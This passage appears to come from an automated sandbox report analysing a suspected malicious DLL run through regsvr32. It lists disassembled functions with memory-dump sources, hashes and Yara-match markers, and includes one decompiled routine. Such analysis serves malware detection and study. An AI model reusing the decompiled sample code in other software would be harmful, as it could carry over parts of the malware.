                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: c10f388924eb787c607a78f2897bb20227984b00d8d3f73530ecccbe1727d1ea
                                                                                                    • Instruction ID: 23e8909e229a7e7c7fb20c6af6264fb6f779969c38b090f5817e3a58c66d1d6b
                                                                                                    • Opcode Fuzzy Hash: c10f388924eb787c607a78f2897bb20227984b00d8d3f73530ecccbe1727d1ea
                                                                                                    • Instruction Fuzzy Hash: 82B09230A07B48C6FA8A2F216C8234422A47B5D740F858018E04D51320DF2C12A99705
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02604308 Relevance: .4, Instructions: 370COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d3103ad7a03d67f880931de899a190f763e068ff2192b7b293841afb138c539
                                                                                                    • Instruction ID: d1bd4aa5c0ef3bd39530b8e999f7dd2c2eace76befb2b06dfb4d8a608e979a99
                                                                                                    • Opcode Fuzzy Hash: 0d3103ad7a03d67f880931de899a190f763e068ff2192b7b293841afb138c539
                                                                                                    • Instruction Fuzzy Hash: 0D021971A047088FDF6CDFA8D08A59EBBF6FB44344F00412DE94AA7290D778A916CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02614790 Relevance: .3, Instructions: 335COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c8a44014736103ecc063740a39bad3446d9484e1e859bec81a70adcdd427a8e2
                                                                                                    • Instruction ID: 8f88ddf8032728525e1c3f77cafaac53b724a05afac0d265f1b55ac1b9541d5a
                                                                                                    • Opcode Fuzzy Hash: c8a44014736103ecc063740a39bad3446d9484e1e859bec81a70adcdd427a8e2
                                                                                                    • Instruction Fuzzy Hash: 1DF101B051460ADFDB58CF28C08999A3BE0FF58318F40852EFC5A9B3A4D774EA64CB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040080 Relevance: .3, Instructions: 329COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E00000001180040080(void* __ecx, signed int __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r9, long long _a16, long long _a24) {
				void* _v24;
				signed int _v40;
				char _v168;
				void* __rdi;
				void* __rsi;
				void* _t74;
				void* _t93;
				unsigned int _t94;
				signed int _t105;
				signed int _t107;
				void* _t116;
				signed long long _t155;
				signed long long _t156;
				intOrPtr* _t160;
				intOrPtr _t193;
				signed long long _t196;
				signed long long _t197;
				signed long long _t198;
				signed long long _t199;
				void* _t201;
				void* _t204;
				signed short* _t228;
				void* _t232;

				_t202 = __rbp;
				_t116 = __eflags;
				_t105 = __edx;
				_a16 = __rbx;
				_a24 = __rbp;
				_t155 =  *0x8005d010; // 0xb03f6156e10
				_t156 = _t155 ^ _t204 - 0x000000c0;
				_v40 = _t156;
				_t201 = __rcx;
				E0000000118002C43C(_t156, __rbx);
				r9d = 0x40;
				_t5 = _t156 + 0x98; // 0x98
				_t160 = _t5;
				asm("sbb edx, edx");
				_t107 = (_t105 & 0xfffff005) + 0x1002;
				if (E0000000118002D69C(_t107, _t116, _t160, _t201, _t196, _t201, __rbp,  &_v168) != 0) goto 0x800400ef;
				 *(_t160 + 0x10) = 0;
				goto 0x8004038d;
				_t74 = E000000011800441B8(_t107, _t156,  *((intOrPtr*)(_t160 + 8)),  &_v168);
				_t197 = _t196 | 0xffffffff;
				r13d = _t197 + 0x56;
				if (_t74 != 0) goto 0x8004020f;
				r9d = _t197 + 0x41;
				asm("sbb edx, edx");
				_t109 = (_t107 & 0xfffff002) + 0x1001;
				if (E0000000118002D69C((_t107 & 0xfffff002) + 0x1001, _t74, _t160, _t201, _t197, _t201, _t202,  &_v168) == 0) goto 0x800400e2;
				if (E000000011800441B8((_t107 & 0xfffff002) + 0x1001, _t156,  *_t160,  &_v168) != 0) goto 0x8004017c;
				 *(_t160 + 0x10) =  *(_t160 + 0x10) | 0x00000304;
				if ( *((intOrPtr*)(_t201 + (_t197 + 1) * 2)) != 0) goto 0x80040150;
				_t19 = _t160 + 0x258; // 0x2f0
				if (E00000001180038A10(_t109, _t156, _t160, _t19, _t232, _t197 + 2) == 0) goto 0x8004020f;
				goto 0x800403b5;
				if (( *(_t160 + 0x10) & 0x00000002) != 0) goto 0x8004020f;
				if ( *((intOrPtr*)(_t160 + 0x14)) == 0) goto 0x800401cf;
				if (E00000001180044330(_t109, _t156,  *_t160,  *((intOrPtr*)(_t160 + 0x14))) != 0) goto 0x800401cf;
				 *(_t160 + 0x10) =  *(_t160 + 0x10) | 0x00000002;
				if ( *((intOrPtr*)(_t201 + (_t197 + 1) * 2)) != 0) goto 0x800401a7;
				_t30 = _t160 + 0x258; // 0x2f0
				if (E00000001180038A10(_t109, _t156, _t160, _t30, _t232, _t197 + 2) == 0) goto 0x8004020f;
				goto 0x800403ca;
				if (( *(_t160 + 0x10) & 0x00000001) != 0) goto 0x8004020f;
				if (E000000011800405D4( ~( *(_t160 + 0x1c)),  *(_t160 + 0x10) & 0x00000001, _t160, _t201, _t232, _t201, _t202, _t197 + 2) == 0) goto 0x8004020f;
				 *(_t160 + 0x10) =  *(_t160 + 0x10) | 0x00000001;
				if ( *((intOrPtr*)(_t201 + (_t197 + 1) * 2)) != 0) goto 0x800401e8;
				_t38 = _t160 + 0x258; // 0x2f0
				if (E00000001180038A10(_t109, _t156, _t160, _t38, _t232, _t197 + 2) != 0) goto 0x800403df;
				if (( *(_t160 + 0x10) & 0x00000300) == 0x300) goto 0x80040382;
				r9d = 0x40;
				asm("sbb edx, edx");
				if (E0000000118002D69C((_t109 & 0xfffff002) + 0x1001, ( *(_t160 + 0x10) & 0x00000300) - 0x300, _t160, _t201, _t197, _t201, _t202,  &_v168) == 0) goto 0x800400e2;
				if (E000000011800441B8((_t109 & 0xfffff002) + 0x1001, _t156,  *_t160,  &_v168) != 0) goto 0x80040382;
				asm("bts dword [ebx+0x10], 0x9");
				if ( *((intOrPtr*)(_t160 + 0x18)) == 0) goto 0x800402ad;
				asm("bts eax, 0x8");
				_t45 = _t160 + 0x258; // 0x2f0
				if ( *_t45 != 0) goto 0x80040382;
				_t198 = _t197 + 1;
				if ( *((intOrPtr*)(_t201 + _t198 * 2)) != 0) goto 0x80040288;
				if (E00000001180038A10((_t109 & 0xfffff002) + 0x1001, _t156, _t160, _t45, _t232, _t198 + 1) == 0) goto 0x80040382;
				goto 0x800403f4;
				if ( *((intOrPtr*)(_t160 + 0x14)) == 0) goto 0x8004034f;
				_t193 =  *_t160;
				if ( *((intOrPtr*)(_t193 + (_t198 + 1) * 2)) != 0) goto 0x800402bc;
				if (0x300 !=  *((intOrPtr*)(_t160 + 0x14))) goto 0x8004034f;
				if (E000000011800405D4(0x300, 0x300 -  *((intOrPtr*)(_t160 + 0x14)), _t160, _t201, _t193, _t201, _t202, _t198 + 1) != 0) goto 0x8004031d;
				_t228 =  *_t160;
				r8d = 0;
				if (_t228 == 0) goto 0x8004030b;
				_t93 = _t193 - 0x41;
				if (_t93 - 0x19 <= 0) goto 0x80040303;
				if (( *_t228 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x8004030b;
				r8d = r8d + 1;
				goto 0x800402ec;
				if (_t228[_t198 + 1] != 0) goto 0x8004030e;
				if (r8d == _t93) goto 0x80040382;
				asm("bts dword [ebx+0x10], 0x8");
				_t57 = _t160 + 0x258; // 0x2f0
				if ( *_t57 != 0) goto 0x80040382;
				_t199 = _t198 + 1;
				if ( *((intOrPtr*)(_t201 + _t199 * 2)) != 0) goto 0x8004032e;
				_t94 = E00000001180038A10(_t228[1] & 0x0000ffff, _t198 + 1, _t160, _t57, _t232, _t199 + 1);
				if (_t94 == 0) goto 0x80040382;
				goto 0x80040409;
				asm("bts eax, 0x8");
				_t61 = _t160 + 0x258; // 0x2f0
				 *(_t160 + 0x10) = _t94;
				if ( *_t61 != 0) goto 0x80040382;
				if ( *((intOrPtr*)(_t201 + (_t199 + 1) * 2)) != 0) goto 0x80040362;
				if (E00000001180038A10(_t228[1] & 0x0000ffff, _t198 + 1, _t160, _t61, _t232, _t199 + 2) != 0) goto 0x8004041e;
				return E000000011800010E0( !( *(_t160 + 0x10) >> 2) & 0x00000001, 0x300, _v40 ^ _t204 - 0x000000c0);
			}


























                                                                                                    0x180040080
                                                                                                    0x180040080
                                                                                                    0x180040080
                                                                                                    0x180040080
                                                                                                    0x180040085
                                                                                                    0x180040095
                                                                                                    0x18004009c
                                                                                                    0x18004009f
                                                                                                    0x1800400a7
                                                                                                    0x1800400aa
                                                                                                    0x1800400af
                                                                                                    0x1800400ba
                                                                                                    0x1800400ba
                                                                                                    0x1800400c9
                                                                                                    0x1800400d1
                                                                                                    0x1800400e0
                                                                                                    0x1800400e2
                                                                                                    0x1800400ea
                                                                                                    0x1800400f8
                                                                                                    0x1800400fd
                                                                                                    0x180040101
                                                                                                    0x180040107
                                                                                                    0x180040110
                                                                                                    0x18004011e
                                                                                                    0x180040126
                                                                                                    0x180040133
                                                                                                    0x180040144
                                                                                                    0x180040146
                                                                                                    0x180040158
                                                                                                    0x18004015d
                                                                                                    0x180040171
                                                                                                    0x180040177
                                                                                                    0x180040180
                                                                                                    0x180040189
                                                                                                    0x18004019e
                                                                                                    0x1800401a0
                                                                                                    0x1800401af
                                                                                                    0x1800401b4
                                                                                                    0x1800401c8
                                                                                                    0x1800401ca
                                                                                                    0x1800401d3
                                                                                                    0x1800401df
                                                                                                    0x1800401e1
                                                                                                    0x1800401f0
                                                                                                    0x1800401f5
                                                                                                    0x180040209
                                                                                                    0x18004021b
                                                                                                    0x18004022b
                                                                                                    0x180040234
                                                                                                    0x180040249
                                                                                                    0x18004025e
                                                                                                    0x180040264
                                                                                                    0x18004026f
                                                                                                    0x180040271
                                                                                                    0x180040275
                                                                                                    0x180040282
                                                                                                    0x180040288
                                                                                                    0x18004028f
                                                                                                    0x1800402a2
                                                                                                    0x1800402a8
                                                                                                    0x1800402b0
                                                                                                    0x1800402b6
                                                                                                    0x1800402c3
                                                                                                    0x1800402c8
                                                                                                    0x1800402d8
                                                                                                    0x1800402da
                                                                                                    0x1800402dd
                                                                                                    0x1800402e6
                                                                                                    0x1800402f0
                                                                                                    0x1800402f7
                                                                                                    0x180040301
                                                                                                    0x180040306
                                                                                                    0x180040309
                                                                                                    0x180040316
                                                                                                    0x18004031b
                                                                                                    0x18004031d
                                                                                                    0x180040322
                                                                                                    0x18004032c
                                                                                                    0x18004032e
                                                                                                    0x180040335
                                                                                                    0x180040341
                                                                                                    0x180040348
                                                                                                    0x18004034a
                                                                                                    0x18004034f
                                                                                                    0x180040353
                                                                                                    0x18004035a
                                                                                                    0x180040360
                                                                                                    0x180040369
                                                                                                    0x18004037c
                                                                                                    0x1800403b4

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 1447195878-0
                                                                                                    • Opcode ID: 0df357ba8017498e824d77b8c7c1a8fa0dc7ca9a15ce504ccd093100131193e6
                                                                                                    • Instruction ID: 04203e541601ede060ac0bbb56f5494b380e53a3e7b0d414d9a5c32880221df8
                                                                                                    • Opcode Fuzzy Hash: 0df357ba8017498e824d77b8c7c1a8fa0dc7ca9a15ce504ccd093100131193e6
                                                                                                    • Instruction Fuzzy Hash: 24C1D032210A8882EBA6EF21D5517DA3391F788BCCF25C612BF5593AC9DF78C7498744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026273A4 Relevance: .2, Instructions: 242COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1b37e0a0df227251c359f7e7019cdb3cfef586ec3c2275a89c99475cfa8d796
                                                                                                    • Instruction ID: 5395aa23bbb740b77f92f0e5e00aa59268f80b79d73fa12c9380ebfba187345f
                                                                                                    • Opcode Fuzzy Hash: f1b37e0a0df227251c359f7e7019cdb3cfef586ec3c2275a89c99475cfa8d796
                                                                                                    • Instruction Fuzzy Hash: 4EB13B7120478D8FDBB9CF28C8967DA7BA1FB46304F50812DD88E8B391DB749649CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261FF40 Relevance: .2, Instructions: 222COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1da88f2b38fe51f2c50b75ed5c90a58ae2ea00bfc974de10e4f51468e74f42fd
                                                                                                    • Instruction ID: c74817fa505104ad0882d4cdee8f3ee04493d940c2009c4832e55e9c5075d6ef
                                                                                                    • Opcode Fuzzy Hash: 1da88f2b38fe51f2c50b75ed5c90a58ae2ea00bfc974de10e4f51468e74f42fd
                                                                                                    • Instruction Fuzzy Hash: 22C1D6706087898FDBBECF28C8856DA7BA9FB55708F50061DE9CA8A254DB745744CB02
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02625108 Relevance: .2, Instructions: 213COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad404732dd66bbd917537b2e1ae54605533b8583c5279401fe50aaa46aef441a
                                                                                                    • Instruction ID: cb1905d321a3797e1ef149aad5e94ff8bc184973a45f5f303f5c11b3c3ddc5aa
                                                                                                    • Opcode Fuzzy Hash: ad404732dd66bbd917537b2e1ae54605533b8583c5279401fe50aaa46aef441a
                                                                                                    • Instruction Fuzzy Hash: 6F9103719047588BDF48DFA8C98A4DDBBF1FB48308F11425DE84ABB290D778A905CF99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026214C4 Relevance: .2, Instructions: 170COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c743d44d805464155a63c90f5eb83ec6a9162803615391a180d299cb3d540829
                                                                                                    • Instruction ID: 470f56c8f9b5a29ce8a1df1b5f9ea523a7128f1b1a45578498fb58eda9c1b320
                                                                                                    • Opcode Fuzzy Hash: c743d44d805464155a63c90f5eb83ec6a9162803615391a180d299cb3d540829
                                                                                                    • Instruction Fuzzy Hash: 8D712270918B08AFDB58DF28C08568E7BB0FF58314F50856EE849EB2A4D774EA49DF41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02608388 Relevance: .2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce6917cd170389ecf4f7684d44be1813753999399d578c77633e09cc253cc93f
                                                                                                    • Instruction ID: 3077e7eec9a9f61b36bdead169372e3b5c1d57974ae6d7b89d8defe5f9112956
                                                                                                    • Opcode Fuzzy Hash: ce6917cd170389ecf4f7684d44be1813753999399d578c77633e09cc253cc93f
                                                                                                    • Instruction Fuzzy Hash: BA511879616688CBDF5CDFA8D4D96AE37A1EF44304F00012DED46C72A6DB74D82ACB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02610F5C Relevance: .2, Instructions: 158COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b042bdaf2f7c58c304eaae477d98076034e6402bf882456935f6052bc8d33062
                                                                                                    • Instruction ID: ed97410a960edc6dbe3b659ce12f32aefbf7de17c91232f25b494473fde8a3e1
                                                                                                    • Opcode Fuzzy Hash: b042bdaf2f7c58c304eaae477d98076034e6402bf882456935f6052bc8d33062
                                                                                                    • Instruction Fuzzy Hash: D6918DB190078ECFDB48CF28C84A5DE7BB0FB14318F104A19F966962A0D3B89625CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026154A8 Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 01813495bad6452af79fd47bd8815020059f895f82bbf8f5e3f972113a861ba4
                                                                                                    • Instruction ID: dca5ea4e58064710bad0b87268e5bd564220b6bc0a7b6072286086b9a5491e1d
                                                                                                    • Opcode Fuzzy Hash: 01813495bad6452af79fd47bd8815020059f895f82bbf8f5e3f972113a861ba4
                                                                                                    • Instruction Fuzzy Hash: CF816BB590674CCFEB98CF28D6895993BE0FF55318F004129FC0E8A2A4D3B8D569CB49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261EEE0 Relevance: .1, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c5a0173ac1023a738412f0b3c396825208deaff21554ab3c240de1df9b81cb3
                                                                                                    • Instruction ID: bca8ef03054e3924f3ae371f92033aca6c12dd1e4d2b83b681a3df55e919f439
                                                                                                    • Opcode Fuzzy Hash: 9c5a0173ac1023a738412f0b3c396825208deaff21554ab3c240de1df9b81cb3
                                                                                                    • Instruction Fuzzy Hash: CD511370D04B58EBDB5CDFA8E88949DBBB0FB44314F10422DE856A72A0DB74A846CF42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02627F00 Relevance: .1, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 141ce5aefbfc3ca2f348c536f36c608ce6610a9447fb14be25c232cbf7608887
                                                                                                    • Instruction ID: 62037d70a840d3596e94c8ea3a8caeb212ad5d1e742ecfaf0c8f104956ff22f0
                                                                                                    • Opcode Fuzzy Hash: 141ce5aefbfc3ca2f348c536f36c608ce6610a9447fb14be25c232cbf7608887
                                                                                                    • Instruction Fuzzy Hash: 315106B090030A8BDB48CF68C4865DEBFF4FB58398F25961DE856AB290D3749691CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02604D94 Relevance: .1, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d94f4de545dd2c0aba3346fd21b3ffa58b81b2e621e53e17287bf2b3887aafc
                                                                                                    • Instruction ID: 50b7226996e6a5225e9cf714c1e8c858087cae13f5813a6df6fde281333df5a0
                                                                                                    • Opcode Fuzzy Hash: 0d94f4de545dd2c0aba3346fd21b3ffa58b81b2e621e53e17287bf2b3887aafc
                                                                                                    • Instruction Fuzzy Hash: 4F51B07090060E8BDF48CF68C48A4DE7FB1FB58398F24461DE816A7290D7B89695CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026187D0 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d9080bf147d4014c97425b11502aa23c9d9baec9788daa4159615f3ce760e2b0
                                                                                                    • Instruction ID: 080ff90f14d56c6fc094300915432f2f9dc36f0a94f249d7826a0f1f8f138df4
                                                                                                    • Opcode Fuzzy Hash: d9080bf147d4014c97425b11502aa23c9d9baec9788daa4159615f3ce760e2b0
                                                                                                    • Instruction Fuzzy Hash: 6C5190B091034E8BDB48CF68C4865DE7FB0FB68398F20461DEC56A6290D77496A5CBC1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026204F4 Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 217bb94777a4b4309d5eba8aefb511c8239ab85c3940f5b8463e5b5c99288c8e
                                                                                                    • Instruction ID: 2a533272d65394ca4ab93e1f3251492d2b2e1ee48acd81ae3402ccedcb09034f
                                                                                                    • Opcode Fuzzy Hash: 217bb94777a4b4309d5eba8aefb511c8239ab85c3940f5b8463e5b5c99288c8e
                                                                                                    • Instruction Fuzzy Hash: 904192B180435E8FDB48DF68C48A5DE7FB0FB68398F204619E856A6250D3B4D6A4CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260B374 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d9fb2343148616ced2f715edd2685858758028a5a99055e1287e252648fb407
                                                                                                    • Instruction ID: 15b86074e5d59a0a4b1a1b47add114bc93df1e2beae924db216cbf90ec5a116b
                                                                                                    • Opcode Fuzzy Hash: 3d9fb2343148616ced2f715edd2685858758028a5a99055e1287e252648fb407
                                                                                                    • Instruction Fuzzy Hash: 6F41D4B090034E8FDB48CF64C48A4DE7FB0FB68398F11461DE959A6250D7B896A4CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261911C Relevance: .1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 63bdd607323b641048aabfdd896c95d401b8a2540f000ca1ddf51cbafdf8e9bb
                                                                                                    • Instruction ID: ef5f5fce764963f924cc8a9170740403896af65aa35a71b6bd083db41cee77d5
                                                                                                    • Opcode Fuzzy Hash: 63bdd607323b641048aabfdd896c95d401b8a2540f000ca1ddf51cbafdf8e9bb
                                                                                                    • Instruction Fuzzy Hash: D93190B0529381AFD388DF28D49691BBBE0FB89305F906A1DF8C6C6260D735D545CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02614CD0 Relevance: .1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
